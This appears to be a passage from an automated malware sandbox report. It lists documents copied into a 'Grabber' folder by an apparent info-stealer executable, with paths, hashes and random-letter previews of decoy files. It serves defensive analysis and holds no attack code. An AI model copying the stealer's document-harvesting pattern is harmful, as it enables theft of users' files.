Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UMMBDNEQBN\JSDNGYCOWY.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690895772725941
Encrypted:	false
SSDEEP:	24:ZTWQe0oC6OG/K8Vsypd0HuXw0xVfU/Vzv98UU:ZTWQr2VyXysHIwcGKUU
MD5:	A002E80B55673139253599B753BDC01A
SHA1:	6AEEF831A5AAB9155AAABB52D173859E20A86932
SHA-256:	F3484FA4E615D7134AC1BF4C3355C6AD63B32AC3CD096345C5EBF6B0CE6669A0
SHA-512:	D4A9257255BA4610E904C005F6734E65D5B0B4489E645792F3AB52AFD59B4B76E4B0FCE1F3457D7E5D3DA3101DAAC80A926FA513B77DAB01F2DAC5F5C4304CA7
Malicious:	false
Preview:	JSDNGYCOWYHKSOWFGCIERRTFYJMLBLSAMTEZRBUWFRXYICIUHZNIMVLJXTFXQNXACRFWSEWJBERQHLEBPYXRECCWDJKIIOUGNYQMGAHSLOPLLALAEDDKJTOOCDGYIBOWZZREIEWSXQRGULZIXFYNIUMNTNALWVABHVLKEJLBKGOKXZWDSWRTTLTQLNTZDYMSECYMQISNCNIAJOWDCCMHWLIVFACQKZXXZJOSENBJHZELIVOCAHDNZGZILFSILTSAJXDBFAIPHVHXYHJHVMVHKVOMYOGGVIKVJUVYLDFTICBCZKSVRDRTALSXFNMCPLGOGSEBKXSHSHVDVDKWEHNIBLPTMWICAACVFWPQNIUVLFSAWPOGDJFOGTXDHMTFWREVZXCABJCKFYXJGAHKTXNFLIILTMBRTKACTMOVDBLCVYDVLNCDXAAINTGCCRZPDTOFCWZWTHLCVGRTQPEBHUFYWLTLNUIOFLOUTCINZEJUVLTZPPDBVDEELCGFQSGJPRJBEALQLZQAYAQRUTUANCYUZJENWEIISDNULLJXJUPBQHEJEUVMKMEUQRDHXPAZVIFDUGNWXKXYWIQQNJNRMYCLJLHWESVCNCQSXILKRQFSYEDZSBHSLAYIWWOVRVVSWUFEAQPMAPAKFCXFBDIPKHPSFGVOJCEEBALPVQKECBBUCTQGQXOQAPOOYAPYQXNDLKJDRFQDILPIWRGDYTFUHSZLJICMMUSSHGHNLKNEDYXJSPECVTAEQTVXATOODAVROWNAPCHDRRBHVDVWBGOSCJGDENAGFCYDIHAPBWLJNOPCQCPTSOHGQQMHEAKRBOBSEHAOMGXJVYWJGLSIQJUOMYPNZTOFVNNMRIVMHOCFZTLTEDAGEXGJXLNRLSHJQGFHIJDLJHOPPMFPYEIXPRQCTRDIYDJEHHSKFBRZMXLZJBDDOYCXQJBCBQFRXVCYCHXKGNDWEEUUKPAGVHHOXFZXZEWWCOVSFYZHILZJQQKFHCLR

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UMMBDNEQBN\UMMBDNEQBN.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	true
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UMMBDNEQBN\WUTJSCBCFX.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.688284131239007
Encrypted:	false
SSDEEP:	24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
MD5:	E8ACCA0F46CBA97FE289855535184C72
SHA1:	059878D0B535AEE9092BF82886FC68DC816D9F08
SHA-256:	CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
SHA-512:	185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
Malicious:	false
Preview:	WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ\DVWHKMNFNN.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ\KATAXZVCPS.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ\NWTVCDUMOB.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ\VLZDGUKUTZ.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ\YPSIACHYXW.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.700014595314478
Encrypted:	false
SSDEEP:	24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
MD5:	960373CA97DEDBA8576ECF40D0D1E39D
SHA1:	E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
SHA-256:	501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
SHA-512:	93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
Malicious:	true
